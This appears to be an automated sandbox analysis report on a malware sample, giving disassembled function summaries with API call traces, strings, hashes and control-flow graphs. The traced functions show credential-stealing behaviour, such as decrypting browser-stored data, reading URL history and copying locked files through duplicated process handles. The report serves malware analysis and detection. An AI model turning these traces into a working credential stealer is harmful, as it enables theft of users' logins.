                                                                                                                                                                                                                                      • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                                                                                                                                                                      Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                                                                                                                                                        • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                                                                        • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                                                                                                                                                        • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                                                      • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                                                                                                                                                                                                                      • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                                                                                                      • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                                                                                      • API String ID: 2744995895-28296030
                                                                                                                                                                                                                                      • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                                                                                                                                                      • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                                                                                                                                                                      Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                                        • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                                                                                                        • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                                                                                                      • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                                      • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                                                                                                                                                      • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040B851
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                                                                                                                                                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                                        • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040BB53
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                                                                                                                                                                                                                      • String ID: chp$v10
                                                                                                                                                                                                                                      • API String ID: 1297422669-2783969131
                                                                                                                                                                                                                                      • Opcode ID: 2d8d3858acf8204944681f745a2db0da9034132aea09d7a248e8269e324108d5
                                                                                                                                                                                                                                      • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d8d3858acf8204944681f745a2db0da9034132aea09d7a248e8269e324108d5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                                                                                                                                                                      Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 504 40e2ab-40e2d5 call 40695d call 406b90 509 40e4a0-40e4af call 4069a3 504->509 510 40e2db-40e300 504->510 511 40e304-40e30f call 406e8f 510->511 515 40e314-40e316 511->515 516 40e476-40e483 call 406b53 515->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 515->517 523 40e302 516->523 524 40e489-40e495 call 40aa04 516->524 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 523->511 524->509 529 40e497-40e49f free 524->529 529->509 544 40e3d0-40e3d6 541->544 545 40e3d9-40e3de 541->545 551 40e3b0 542->551 552 40e3b3-40e3c1 wcschr 542->552 544->545 547 40e3e0-40e3f1 memcpy 545->547 548 40e3f4-40e3f9 545->548 547->548 549 40e3fb-40e40c memcpy 548->549 550 40e40f-40e414 548->550 549->550 553 40e416-40e427 memcpy 550->553 554 40e42a-40e42f 550->554 551->552 552->541 555 40e3c3-40e3c6 552->555 553->554 556 40e431-40e442 memcpy 554->556 557 40e445-40e44a 554->557 555->541 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0040E49A
                                                                                                                                                                                                                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                                                        • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,762D2EE0), ref: 0040E3EC
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,762D2EE0), ref: 0040E407
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,762D2EE0), ref: 0040E422
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,762D2EE0), ref: 0040E43D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                                                                                                                      • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                                                                                      • API String ID: 3849927982-2252543386
                                                                                                                                                                                                                                      • Opcode ID: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                                                                                                                                                      • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                                                                                                                                      Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 562 4091b8-40921b memset call 40a6e6 call 444432 567 409520-409526 562->567 568 409221-40923b call 40b273 call 438552 562->568 572 409240-409248 568->572 573 409383-4093ab call 40b273 call 438552 572->573 574 40924e-409258 call 4251c4 572->574 586 4093b1 573->586 587 4094ff-40950b call 443d90 573->587 579 40937b-40937e call 424f26 574->579 580 40925e-409291 call 4253cf * 2 call 4253af * 2 574->580 579->573 580->579 610 409297-409299 580->610 590 4093d3-4093dd call 4251c4 586->590 587->567 596 40950d-409511 587->596 597 4093b3-4093cc call 4253cf * 2 590->597 598 4093df 590->598 596->567 600 409513-40951d call 408f2f 596->600 597->590 613 4093ce-4093d1 597->613 602 4094f7-4094fa call 424f26 598->602 600->567 602->587 610->579 612 40929f-4092a3 610->612 612->579 614 4092a9-4092ba 612->614 613->590 617 4093e4-4093fb call 4253af * 2 613->617 615 4092bc 614->615 616 4092be-4092e3 memcpy memcmp 614->616 615->616 618 409333-409345 memcmp 616->618 619 4092e5-4092ec 616->619 617->602 627 409401-409403 617->627 618->579 622 409347-40935f memcpy 618->622 619->579 621 4092f2-409331 memcpy * 2 619->621 624 409363-409378 memcpy 621->624 622->624 624->579 627->602 628 409409-40941b memcmp 627->628 628->602 629 409421-409433 memcmp 628->629 630 4094a4-4094b6 memcmp 629->630 631 409435-40943c 629->631 630->602 633 4094b8-4094ed memcpy * 2 630->633 631->602 632 409442-4094a2 memcpy * 3 631->632 634 4094f4 632->634 633->634 634->602
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3715365532-3916222277
                                                                                                                                                                                                                                      • Opcode ID: 0b5d2420ae1e05a47c945b1ba07dbbc3733902293ebddf2e47a1979dcc9084dd
                                                                                                                                                                                                                                      • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0b5d2420ae1e05a47c945b1ba07dbbc3733902293ebddf2e47a1979dcc9084dd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                                                                                                                                                      Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                                                        • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                                                        • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                                                        • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                                                                        • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                                                        • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                                      • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                                        • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                                                        • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                                        • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                                                                                                                                      • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                                      • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                                                      • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                                                                                      • String ID: bhv
                                                                                                                                                                                                                                      • API String ID: 4234240956-2689659898
                                                                                                                                                                                                                                      • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                                                                                                                                                      • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                                                                                                                                                                      Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 691 413f4f-413f52 692 413fa5 691->692 693 413f54-413f5a call 40a804 691->693 695 413f5f-413fa4 GetProcAddress * 5 693->695 695->692
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                                      • API String ID: 2941347001-70141382
                                                                                                                                                                                                                                      • Opcode ID: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                                                                                                                                                      • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                                                                                                                                                                                                      Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                                                                      • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                                                                                      • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                                                                                                                                      • String ID: visited:
                                                                                                                                                                                                                                      • API String ID: 2470578098-1702587658
                                                                                                                                                                                                                                      • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                                                                                                                                                      • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                                                                                                                                                                      Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 721 40e175-40e1a1 call 40695d call 406b90 726 40e1a7-40e1e5 memset 721->726 727 40e299-40e2a8 call 4069a3 721->727 729 40e1e8-40e1f3 call 406e8f 726->729 732 40e1f8-40e1fa 729->732 733 40e270-40e27d call 406b53 732->733 734 40e1fc-40e219 call 40dd50 * 2 732->734 733->729 739 40e283-40e286 733->739 734->733 745 40e21b-40e21d 734->745 742 40e291-40e294 call 40aa04 739->742 743 40e288-40e290 free 739->743 742->727 743->742 745->733 746 40e21f-40e235 call 40742e 745->746 746->733 749 40e237-40e242 call 40aae3 746->749 749->733 752 40e244-40e26b _snwprintf call 40a8d0 749->752 752->733
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0040E28B
                                                                                                                                                                                                                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                                                        • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                                                                                        • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
